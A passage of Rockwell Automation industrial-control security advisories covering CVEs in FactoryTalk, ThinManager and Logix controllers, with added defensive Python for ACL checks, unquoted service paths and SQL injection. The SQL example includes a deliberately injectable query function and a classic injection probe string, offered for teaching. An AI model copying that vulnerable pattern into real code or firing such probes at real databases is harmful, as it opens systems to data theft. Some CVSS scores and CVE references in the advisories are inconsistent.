The v6.40 release of FactoryTalk® Policy Manager allowed the private keys to be insecurely stored with read and execute privileges for the Windows group, ‘Everyone’. These keys are used to generate digital certificates and pre-shared keys. This vulnerability could allow a malicious user with access to the machine to obtain private keys. If obtained, a malicious user could impersonate resources on the secured network. For customers using FactoryTalk® Policy Manager v6.40 who mitigated CVE-2021-22681 and CVE-2022-1161 by implementing CIP security and did not update to the versions of the software that contain the remediation, this vulnerability could allow a threat actor to exploit CVE-2022-1161 and CVE-2022-1161.

CVSS Base Score v3.1: 6.5/10
CVSS Vector String: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

CVSS Base Score v4.0: 6.0/10
CVSS Vector String: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N

CWE-269: Improper Privilege Management

CVE-2024-6236 IMPACT

An exposure of sensitive information vulnerability exists in the FactoryTalk® System Service. A malicious user could exploit this vulnerability by starting a back-up or restore process, which temporarily exposes private keys, passwords, pre-shared keys, and database folders when they are temporarily copied to an interim folder. This vulnerability is due to the lack of explicit permissions set on the backup folder. If private keys are obtained by a malicious user, they could impersonate resources on the secured network.

CVSS Base Score v3.1: 5.9/10
CVSS Vector String: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N

CVSS Base Score v4.0: 1.8/10
CVSS Vector String: CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N

CWE-269: Improper Privilege Management

Known Exploited Vulnerability (KEV) database: No

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Mitigations and Workarounds

Users using the affected software are encouraged to implement the following steps to invalidate the existing vulnerable private keys/digital certificates and regenerate new secure ones.

  • Clear CIP Security configurations from devices and from FactoryTalk® Policy Manager

  • Update FactoryTalk® System Services and FactoryTalk® Policy Manager to v6.40.01

  • Redeploy CIP Security Policy

Detailed steps are below (FactoryTalk System Services (FTSS) is updated through the installation of FactoryTalk Policy Manager (FTPM)).

1) Remove deployed security policy from all devices using FactoryTalk® Policy Manager (FTPM):
   a. Open FTPM.
   b. Document all Zone’s security settings and all Conduit’s settings as you must re-create them after updating FTPM.
   c. Change all devices port’s Policies > Zone values to the “Unassigned” Zone.
   d. Delete all zones and conduits.
   e. Deploy (CIP). Ensure that all endpoints were reset successfully.
   f. [migrating from v6.40 only] Deploy (OPC UA). Ensure all endpoints were reset successfully.
      i. For any OPC UA clients, perform whatever steps are required by those clients to remove the previously applied certificates.
   g. Close FTPM.

2) Delete the \FTSS_backup folder:
   a. c:\ProgramData\Rockwell\RNAServer\Global\RnaStore\FTSS_Backup

3) Delete the \keystore folder:
   a. c:\ProgramData\Rockwell Automation\FactoryTalk System Services\keystore

4) Delete any backup copies of the \keystore folder. They are named the same as the \keystore folder but with a suffix appended, like:
   a. c:\ProgramData\Rockwell Automation\FactoryTalk System Services\keystore_source_2024_04_25_12_25_38_541566

5) Delete the PSKs.json file:
   a. c:\ProgramData\Rockwell Automation\FactoryTalk System Services\PSKs.json

6) Delete any backup copies of the PSKs.json file. They are named the same as the PSKs.json file but with a suffix appended, like:
   a. c:\ProgramData\Rockwell Automation\FactoryTalk System Services\PSKs.json_source_2024_05_17_07_38_25_200356

7) Install FactoryTalk® Policy Manager version 6.40.01.
   a. Restart the computer when prompted at the end of the install.

8) Open FTPM. FTPM will attempt to connect to the FactoryTalk® System Services web server before proceeding.

9) If FTPM could not successfully connect to FactoryTalk® System Services (FTSS), it is because the FTSS service has not started yet. It will eventually start, or you can start the FTSS service manually in Windows Services.

10) Re-create the original Zones.

11) Move the devices from the unassigned Zone back to their original zones.

12) Re-create the original Conduits.

13) Deploy (CIP endpoints).

14) [migrating from v6.40 only] Deploy (OPC UA endpoints).
   a. For any OPC UA client endpoints, manually apply the newly generated certificates from this deploy.
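Two parts of the procedure above are easy to get wrong by hand: steps 4 and 6 rely on recognising every time-stamped backup copy of the keystore folder and PSKs.json, and the weakness behind CVE-2024-6325 is an ACL that grants the Windows group 'Everyone' read and execute on the keystore, which is worth re-checking once v6.40.01 is installed. The Python below is an added example, not Rockwell Automation's code: `stale_copy_names` picks out backup copies by the `_source_<timestamp>` suffix shown in the steps, and `everyone_access` parses the output of `icacls` for the keystore path and reports what the Everyone group is granted. It reports and deletes nothing. The directory listing and icacls text are constructed samples in the shape the real tools produce; the function names are chosen here.

```python
import os
import re

# Keystore path given in step 3 of the procedure (a Windows path; the script
# never opens it, it only matches names and parses icacls text).
KEYSTORE = r"C:\ProgramData\Rockwell Automation\FactoryTalk System Services\keystore"

# Backup copies carry the original name plus a "_source_" timestamp suffix,
# e.g. keystore_source_2024_04_25_12_25_38_541566 (the form shown in step 4).
_STALE_COPY_RE = re.compile(
    r"^(keystore|PSKs\.json)_source_\d{4}(?:_\d{2}){5}_\d+$"
)


def stale_copy_names(names):
    """Entries of a directory listing that are time-stamped backup copies of the
    keystore folder or PSKs.json (what steps 4 and 6 tell you to delete)."""
    return sorted(n for n in names if _STALE_COPY_RE.match(n))


def find_stale_copies(directory):
    """Same check against a real directory; reports only, deletes nothing."""
    return stale_copy_names(os.listdir(directory))


# One icacls ACE looks like "Everyone:(OI)(CI)(RX)": inheritance flags in
# parentheses followed by the access rights in parentheses.
_ACE_RE = re.compile(r"^([^:()]+):((?:\([^)]*\))+)$")
_INHERIT_FLAGS = {"OI", "CI", "IO", "NP", "I"}


def parse_icacls(output, path):
    """Parse the text printed by `icacls <path>` into (principal, rights) pairs.
    icacls prints the path followed by the first ACE on one line and the
    remaining ACEs indented on the lines that follow."""
    aces = []
    for line in output.splitlines():
        line = line.strip()
        if line.startswith(path):
            line = line[len(path):].strip()
        m = _ACE_RE.match(line)
        if not m:
            continue  # blank line or the "Successfully processed" trailer
        flags = re.findall(r"\(([^)]*)\)", m.group(2))
        rights = ",".join(f for f in flags if f not in _INHERIT_FLAGS)
        aces.append((m.group(1), rights))
    return aces


def everyone_access(output, path):
    """Rights the 'Everyone' group holds on `path` according to icacls output,
    or '' if it holds none.  The v6.40 weakness shows up as 'RX' on KEYSTORE."""
    return ",".join(r for p, r in parse_icacls(output, path) if p == "Everyone")


# Constructed samples (not captured from a real system).
SAMPLE_LISTING = [
    "keystore",
    "keystore_source_2024_04_25_12_25_38_541566",
    "PSKs.json",
    "PSKs.json_source_2024_05_17_07_38_25_200356",
    "PSKs.json_source_notes.txt",  # no timestamp suffix: not a backup copy
]
_PAD = " " * len(KEYSTORE)
SAMPLE_ICACLS_WEAK = "\n".join([
    KEYSTORE + " Everyone:(OI)(CI)(RX)",
    _PAD + " NT AUTHORITY\\SYSTEM:(OI)(CI)(F)",
    _PAD + " BUILTIN\\Administrators:(OI)(CI)(F)",
    "",
    "Successfully processed 1 files; Failed processing 0 files",
])
SAMPLE_ICACLS_FIXED = "\n".join([
    KEYSTORE + " NT AUTHORITY\\SYSTEM:(OI)(CI)(F)",
    _PAD + " BUILTIN\\Administrators:(OI)(CI)(F)",
    "",
    "Successfully processed 1 files; Failed processing 0 files",
])

if __name__ == "__main__":
    print("stale copies:", stale_copy_names(SAMPLE_LISTING))
    print("Everyone on keystore (weak):", everyone_access(SAMPLE_ICACLS_WEAK, KEYSTORE) or "none")
    print("Everyone on keystore (fixed):", everyone_access(SAMPLE_ICACLS_FIXED, KEYSTORE) or "none")
```

On a real host, feed `everyone_access` the output of `icacls "<keystore path>"` taken after step 7; a non-empty result means the old ACL survived the update and the regenerated keys are as exposed as the ones just deleted.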

Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.

  • Security Best Practices

ADDITIONAL RESOURCES

  • JSON CVE-2024-6325

  • JSON CVE-2024-6326

 

Critical
SD1677 | ThinManager® ThinServer™ Improper Input Validation Vulnerabilities
Published Date: June 20, 2024
Last Updated: October 16, 2024
CVE IDs: CVE-2024-5988, CVE-2024-5989, CVE-2024-5990
CVSS Scores (v3.1): 9.8, 7.5
CVSS Scores (v4.0): 9.3, 8.7
Known Exploited Vulnerability (KEV): No
Corrected: Yes
Workaround: Yes

ThinManager® ThinServer™ Improper Input Validation Vulnerabilities

Published Date: June 25, 2024

Last updated: June 25, 2024

Revision Number: 1.0

CVSS Score: v3.1: 9.8/10, 7.5/10; v4.0: 9.3/10, 8.7/10

AFFECTED PRODUCTS AND SOLUTION

Affected Product | CVE | First Known in Software Version | Corrected in Software Version (Available Here)
ThinManager® ThinServer™ | CVE-2024-5988, CVE-2024-5989 | 11.1.0 | 11.1.8
ThinManager® ThinServer™ | CVE-2024-5988, CVE-2024-5989 | 11.2.0 | 11.2.9
ThinManager® ThinServer™ | CVE-2024-5988, CVE-2024-5989 | 12.0.0 | 12.0.7
ThinManager® ThinServer™ | CVE-2024-5988, CVE-2024-5989 | 12.1.0 | 12.1.8
ThinManager® ThinServer™ | CVE-2024-5988, CVE-2024-5989 | 13.0.0 | 13.0.5
ThinManager® ThinServer™ | CVE-2024-5988, CVE-2024-5989 | 13.1.0 | 13.1.3
ThinManager® ThinServer™ | CVE-2024-5988, CVE-2024-5989 | 13.2.0 | 13.2.2
ThinManager® ThinServer™ | CVE-2024-5990 | 11.1.0 | 11.1.8
ThinManager® ThinServer™ | CVE-2024-5990 | 11.2.0 | 11.2.9
ThinManager® ThinServer™ | CVE-2024-5990 | 12.0.0 | 12.0.7
ThinManager® ThinServer™ | CVE-2024-5990 | 12.1.0 | 12.1.8
ThinManager® ThinServer™ | CVE-2024-5990 | 13.0.0 | 13.0.4
ThinManager® ThinServer™ | CVE-2024-5990 | 13.1.0 | 13.1.2

 

Mitigations and Workarounds

Customers using the affected software are encouraged to apply the risk mitigations from the list below, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the potential risk of vulnerability.

  • Update to the corrected software versions via the ThinManager® Downloads Site

  • Limit remote access for TCP Port 2031 to known thin clients and ThinManager® servers.

  • Security Best Practices

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities. This vulnerability was discovered and reported to Rockwell Automation by security researchers at Tenable Network Security.

CVE-2024-5988 IMPACT

Due to an improper input validation, an unauthenticated threat actor can send a malicious message to invoke a local or remote executable and cause a remote code execution condition on the affected device.  

CVSS 3.1 Base Score: 9.8/10
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3/10
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-20: Improper Input Validation

CVE-2024-5989 IMPACT

Due to an improper input validation, an unauthenticated threat actor can send a malicious message to invoke SQL injection into the program and cause a remote code execution condition on the affected device.

CVSS 3.1 Base Score: 9.8/10
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3/10
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-20: Improper Input Validation

CVE-2024-5990 IMPACT

Due to an improper input validation, an unauthenticated threat actor can send a malicious message to a monitor thread within ThinServer™ and cause a denial-of-service condition on the affected device.

CVSS 3.1 Base Score: 7.5/10
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS 4.0 Base Score: 8.7/10
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE-20: Improper Input Validation

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

  • CVE-2024-5988 JSON

  • CVE-2024-5989 JSON

  • CVE-2024-5990 JSON

Critical
SD1676 | FactoryTalk® View SE v11 Information Leakage Vulnerability via Authentication Restriction
Published Date: June 12, 2024
Last Updated: December 01, 2024
CVE IDs: CVE-2024-37368
CVSS Scores (v3.1): 9.8
CVSS Scores (v4.0): 9.2
Known Exploited Vulnerability (KEV): No
Corrected: Yes
Workaround: No

Published Date: June 13, 2024

Last updated: June 13, 2024

Revision Number: 1.0

CVSS Score: v3.1: 9.8/10, v4.0: 9.2/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in Software Version | Corrected in Software Version
FactoryTalk® View SE | v11.0 | v14.0

Mitigations and Workarounds 

Users using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.   

  • It is recommended that users enforce proper access controls within the network and segment networks containing sensitive information using IPSec: https://rockwellautomation.custhelp.com/app/answers/answer_view/a_id/1090456

  • Security Best Practices

 

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring systems to assess the following vulnerabilities.

CVE-2024-37368 IMPACT

A user authentication vulnerability exists in the affected product. The vulnerability allows a user from a remote system with FTView to send a packet to the customer’s server to view an HMI project. This action is allowed without proper authentication verification.

CVSS 3.1 Base Score: 9.8/10

CVSS 4.0 Base Score: 9.2/10
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

CWE-287: Improper Authentication

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.

  • JSON CVE-2024-37368

High
SD1675 | FactoryTalk® View SE v12 Information Leakage Vulnerability via Authentication Restriction
Published Date: June 12, 2024
Last Updated: December 01, 2024
CVE IDs: CVE-2024-37367
CVSS Scores (v3.1): 9.8
CVSS Scores (v4.0): 9.2
Known Exploited Vulnerability (KEV): No
Corrected: Yes
Workaround: No

Published Date: June 13, 2024

Last updated: June 13, 2024

Revision Number: 1.0

CVSS Score: v3.1: 9.8/10, v4.0: 9.2/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in Software Version | Corrected in Software Version
FactoryTalk® View SE | v12.0 | V14.0 and later

Mitigations and Workarounds 

Users using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.   

  • It is recommended that users enforce proper access controls within the network and segment networks containing sensitive information using IPSec: https://rockwellautomation.custhelp.com/app/answers/answer_view/a_id/1090456

  • Security Best Practices

 

VULNERABILITY DETAILS

Rockwell Automation used versions 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities.

 

CVE-2024-37367 IMPACT

A user authentication vulnerability exists in the affected product. The vulnerability allows a user on a remote system running FTView to send a packet to the customer's server and view an HMI project. This action is allowed without proper authentication verification.

 

 

CVSS 4.0 Base Score: 8.2/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N 

CWE-287: Improper Authentication

 

Known Exploited Vulnerability (KEV) database: No

 

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

 

 

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.    

  • JSON CVE-2024-37367

 

High
SD1674 | FactoryTalk® View SE Local Privilege Escalation Vulnerability via Local File Permissions
Published Date:
June 12, 2024
Last Updated:
December 01, 2024
CVE IDs:
CVE-2024-37369
CVSS Scores (v3.1):
7.8
CVSS Scores (v4.0):
8.5
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: June 13, 2024

Last updated: June 13, 2024

Revision Number: 1.0

CVSS Score: v3.1: 7.8/10, v4.0: 8.5/10 

 

The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

 

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in software version | Corrected in software version
FactoryTalk® View SE | V12.0 | v14

Mitigations and Workarounds 

Users using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.   

  • Use the Secure Install option when installing FactoryTalk® Services Platform.

  • Security Best Practices

 

VULNERABILITY DETAILS

Rockwell Automation used versions 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities.

 

CVE-2024-37369 IMPACT

A privilege escalation vulnerability exists in the affected product. The vulnerability allows low-privilege users to edit scripts, bypassing Access Control Lists, and potentially gaining further access within the system.

 

CVSS 3.1 Base Score: 7.8/10  

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

 

CVSS 4.0 Base Score: 8.5/10

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

 

CWE-732: Incorrect Permission Assignment for Critical Resource

 

Known Exploited Vulnerability (KEV) database: No

 

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

 

 

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.    

  • JSON CVE-2024-37369

High
SD1673 | Multicast Request Causes major nonrecoverable fault on Select Controllers
Published Date:
June 12, 2024
Last Updated:
December 01, 2024
CVE IDs:
CVE-2024-5659
CVSS Scores (v3.1):
7.4
CVSS Scores (v4.0):
8.3
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes

Published Date: June 11, 2024

Last updated: June 11, 2024

Revision Number: 1.0

CVSS Score: v3.1: 7.4/10, v4.0: 8.3/10

 

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in firmware revision | Corrected in firmware revision
ControlLogix® 5580 | V34.011 | V34.014, V35.013, V36.011 and later
GuardLogix 5580 | V34.011 | V34.014, V35.013, V36.011 and later
1756-EN4 | V4.001 | V6.001 and later
CompactLogix 5380 | V34.011 | V34.014, V35.013, V36.011 and later
Compact GuardLogix 5380 | V34.011 | V34.014, V35.013, V36.011 and later
CompactLogix 5480 | V34.011 | V34.014, V35.013, V36.011 and later

VULNERABILITY DETAILS

Rockwell Automation used versions 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities.

Rockwell Automation was made aware of a vulnerability that causes all affected controllers on the same network to enter a major nonrecoverable fault (MNRF/Assert). This vulnerability could be exploited by sending abnormal packets to the mDNS port. If exploited, the availability of the device would be compromised.

 

CVE-2024-5659 IMPACT

CVSS Base Score v3.1: 7.4/10

CVSS Vector String: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

CVSS Base Score v4.0: 8.3/10

CVSS Vector String: CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H

CWE-670: Always Incorrect Flow Implementation

Known Exploited Vulnerability (KEV) database:  No

 

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Mitigations and Workarounds

Users using the affected software and who are not able to upgrade to one of the corrected versions are encouraged to apply the risk mitigations, where possible.

  • Users who do not use Automatic Policy Deployment (APD) should block mDNS port 5353 to help prevent communication.

  • Enable CIP Security. See the CIP Security with Rockwell Automation Products Application Technique.

  • Security Best Practices

ADDITIONAL RESOURCES

  • JSON CVE-2024-5659

SD1672 | IMPORTANT NOTICE: Rockwell Automation Reiterates Customer Guidance to Disconnect Devices from the Internet to Protect from Cyber Threats
Published Date:
May 21, 2024
Last Updated:
December 03, 2024
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

IMPORTANT NOTICE: Rockwell Automation Reiterates Customer Guidance to Disconnect Devices from the Internet to Protect from Cyber Threats

Due to heightened geopolitical tensions and adversarial cyber activity globally, Rockwell Automation is issuing this notice urging all customers to take IMMEDIATE action to assess whether they have devices facing the public internet and, if so, urgently remove that connectivity for devices not specifically designed for public internet connectivity.

Consistent with Rockwell Automation’s guidance for all devices not specifically designed for public internet connectivity (for example, cloud and edge offerings), users should never configure their assets to be directly connected to the public-facing internet. Removing that connectivity as a proactive step reduces attack surface and can immediately reduce exposure to unauthorized and malicious cyber activity from external threat actors.

More information on attacks on public-internet-exposed assets, including information on how to identify exposed assets and disconnect them from the public internet, is available in these documents from Rockwell Automation and CISA (Cybersecurity and Infrastructure Security Agency):

  • Rockwell Automation | Advisory on web search tools that identify ICS devices and systems connected to the Internet [login required]
  • CISA | NSA and CISA Recommend Immediate Actions to Reduce Exposure Across Operational Technologies and Control Systems
  • CISA | How-to Guide: Stuff Off Shodan
  • Defending OT Operations Against Ongoing Pro-Russia Hacktivist Activity 

In addition to disconnecting assets from the public internet or if disconnection is not feasible, Rockwell Automation also urges its customers to follow the security best practices outlined in this document: Rockwell Automation | Security Best Practices [login required].

Customers should be aware of the following related CVEs and ensure mitigations are in place, where possible.

  • CVE-2021-22681, ICSA-21-056-03: CISA | Rockwell Automation Logix Controllers (Update A), https://www.cisa.gov/news-events/ics-advisories/icsa-21-056-03
  • CVE-2022-1159, ICSA-22-090-07: CISA | Rockwell Automation Studio 5000 Logix Designer, https://www.cisa.gov/news-events/ics-advisories/icsa-22-090-07
  • CVE-2023-3595, ICSA-23-193-01: CISA | Rockwell Automation Select Communication Modules, https://www.cisa.gov/news-events/ics-advisories/icsa-23-193-01
  • CVE-2023-46290, ICSA-23-299-06: CISA | Rockwell Automation FactoryTalk Services Platform, https://www.cisa.gov/news-events/ics-advisories/icsa-23-299-06
  • CVE-2024-21914, ICSA-24-086-04: CISA | Rockwell Automation FactoryTalk View ME, https://www.cisa.gov/news-events/ics-advisories/icsa-24-086-04
  • CVE-2024-21915, ICSA-24-046-16: CISA | Rockwell Automation FactoryTalk Service Platform, https://www.cisa.gov/news-events/ics-advisories/icsa-24-046-16
  • CVE-2024-21917, ICSA-24-030-06: CISA | Rockwell Automation FactoryTalk Service Platform, https://www.cisa.gov/news-events/ics-advisories/icsa-24-030-06

High
SD1671 | FactoryTalk® Remote Access™ has Unquoted Executables
Published Date:
May 07, 2024
Last Updated:
December 04, 2024
CVE IDs:
CVE-2024-3640
CVSS Scores (v3.1):
7.7
CVSS Scores (v4.0):
7.0
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: May 14, 2024

Last updated: May 14, 2024

Revision Number: 1.0

CVSS Score: v3.1: 7.7/10, v4.0: 7.0/10

 

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in software version | Corrected in software version
FactoryTalk® Remote Access™ (FTRA) | v13.5.0.174 | V13.6

VULNERABILITY DETAILS

Rockwell Automation used versions 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-3640 IMPACT

An unquoted executable path exists in the affected products, possibly resulting in remote code execution if exploited. While running the FTRA installer package, the executable path is not properly quoted, which could allow a threat actor to enter a malicious executable and run it as a System user. A threat actor needs admin privileges to exploit this vulnerability. 
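To see what the unquoted-path condition means for a service entry, here is an added Python audit routine (not Rockwell's code) that classifies Windows service ImagePath values for CWE-428 and produces the quoted form; the service names and paths below are constructed, not FTRA's real install paths.

```python
def audit_image_path(image_path):
    """Classify a Windows service ImagePath for CWE-428.

    An unquoted path containing spaces is resolved by trying each space-
    delimited prefix in turn (with .exe appended) until one exists, so every
    directory in which such a prefix could be created is a point that must be
    write-protected. Returns the intended executable, the probe paths tried
    before it, and whether the entry is vulnerable.
    """
    s = image_path.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        exe = s[1:end] if end != -1 else s[1:]
        return {"executable": exe, "quoted": True, "probe_paths": [], "vulnerable": False}
    parts = s.split(" ")
    probes = []
    exe = None
    for i in range(1, len(parts) + 1):
        prefix = " ".join(parts[:i])
        if prefix.lower().endswith(".exe"):
            exe = prefix
            break
        probes.append(prefix + ".exe")
    if exe is None:
        # No explicit .exe token: the loader appends .exe to the first token,
        # so the first probe is the real executable and nothing precedes it.
        exe, probes = probes[0], []
    return {"executable": exe, "quoted": False, "probe_paths": probes,
            "vulnerable": bool(probes)}


def quote_image_path(image_path):
    """Hardened form: wrap the executable in quotes, keeping its arguments."""
    info = audit_image_path(image_path)
    if info["quoted"]:
        return image_path.strip()
    args = image_path.strip()[len(info["executable"]):].strip()
    return f'"{info["executable"]}"' + (f" {args}" if args else "")


def find_vulnerable_services(services):
    """services: {service name: ImagePath}. Returns names needing repair, sorted."""
    return sorted(name for name, path in services.items()
                  if audit_image_path(path)["vulnerable"])


# Constructed sample of registry-style ImagePath values (not real Rockwell paths).
SAMPLE_SERVICES = {
    "ExampleRemoteAccessSvc": r"C:\Program Files\Example Vendor\Remote Access\ftra_svc.exe -service",
    "ExampleUpdater": r'"C:\Program Files\Example Vendor\Updater\updater.exe" --quiet',
    "ExampleAgent": r"C:\ExampleAgent\agent.exe",
}


if __name__ == "__main__":
    for name in find_vulnerable_services(SAMPLE_SERVICES):
        info = audit_image_path(SAMPLE_SERVICES[name])
        print(name, "probes before the real binary:", info["probe_paths"])
        print("  fixed ImagePath:", quote_image_path(SAMPLE_SERVICES[name]))
```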

 

CVSS Base Score v3.1: 6.5/10

CVSS Vector String: CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H

CWE: CWE-428: Unquoted Search Path or Element

 

CVSS Base Score v4.0: 7.0/10

CVSS Vector String 4.0: CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

 

Known Exploited Vulnerability (KEV) database:  No

 

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

 

Mitigations and Workarounds 

Users using the affected software and who are not able to upgrade to one of the corrected versions are encouraged to apply security best practices below, where possible. 

  • Security Best Practices 

 

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.     

 

  • JSON CVE-2024-3640

 

High
SD1670 | Datalog Function within FactoryTalk® View SE contains SQL Injection Vulnerability
Published Date:
May 07, 2024
Last Updated:
December 03, 2024
CVE IDs:
CVE-2024-4609
CVSS Scores (v3.1):
7.6
CVSS Scores (v4.0):
8.8
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

 

Published Date:  May 15, 2024

Last updated: May 22, 2024  

May 22, 2024 - Updated corrected software versions

Revision Number: 2.0

CVSS Score: v3.1: 7.6/10, v4.0: 8.8/10

 

The security of our products is important to us as your chosen industrial automation supplier. This vulnerability was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving their business or production environments.

 

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in software version | Corrected in software version
FactoryTalk® View SE | < 14 | V11, 12, 13, 14 or later

VULNERABILITY DETAILS

Rockwell Automation used versions 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities.

A vulnerability exists in the FactoryTalk® View SE Datalog function that could allow a threat actor to inject a malicious SQL statement if the SQL database has no authentication in place or if legitimate credentials were stolen. If exploited, the attack could result in information exposure, revealing sensitive information. Additionally, a threat actor could potentially modify and delete the data in a remote database. An attack would only affect the HMI design time, not runtime.    
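An added example, not FactoryTalk code, showing the vulnerable pattern beside its hardened form for a datalog-style tag lookup: the table, tag names and the TAG_NAME allowlist are constructed assumptions, and sqlite3 stands in for the remote SQL database.

```python
import re
import sqlite3

# Allowlist for tag names (assumption for this example): identifier characters only.
TAG_NAME = re.compile(r"^[A-Za-z_][A-Za-z0-9_]{0,63}$")


def make_sample_db():
    """Constructed stand-in for a datalog table: tag name, timestamp, value."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE TagValue (TagName TEXT, Stamp TEXT, Val REAL)")
    conn.executemany("INSERT INTO TagValue VALUES (?, ?, ?)", [
        ("Line1_Pump_Speed", "2024-05-15T10:00:00", 1450.0),
        ("Line1_Pump_Speed", "2024-05-15T10:01:00", 1452.5),
        ("Recipe_Setpoint", "2024-05-15T10:00:00", 73.2),
    ])
    return conn


def read_tag_unsafe(conn, tag_name):
    """Vulnerable pattern: the tag name is spliced into the SQL text, so quote
    characters inside it change the statement the database executes."""
    sql = "SELECT TagName, Stamp, Val FROM TagValue WHERE TagName = '" + tag_name + "'"
    return conn.execute(sql).fetchall()


def read_tag_safe(conn, tag_name):
    """Hardened: reject names outside the allowlist, then bind the value as a
    parameter so the driver never interprets it as SQL. Database-side
    authentication is still required; this only removes the injection path."""
    if not TAG_NAME.match(tag_name):
        raise ValueError("invalid tag name")
    sql = "SELECT TagName, Stamp, Val FROM TagValue WHERE TagName = ?"
    return conn.execute(sql, (tag_name,)).fetchall()


if __name__ == "__main__":
    db = make_sample_db()
    probe = "x' OR '1'='1"  # constructed input that is not a tag name
    print("unsafe rows returned:", len(read_tag_unsafe(db, probe)))
    try:
        read_tag_safe(db, probe)
    except ValueError as err:
        print("safe lookup rejected input:", err)
```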

 

CVE-2024-4609 IMPACT

CVSS v3.1 Base Score: 7.6

CVSS Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L

 

CVSS v4.0 Base Score: 8.8

CVSS Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:N/SI:N/SA:N

CWE: CWE-20 Improper Input Validation

 

Known Exploited Vulnerability (KEV) database:  No

 

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

 

Mitigations and Workarounds 

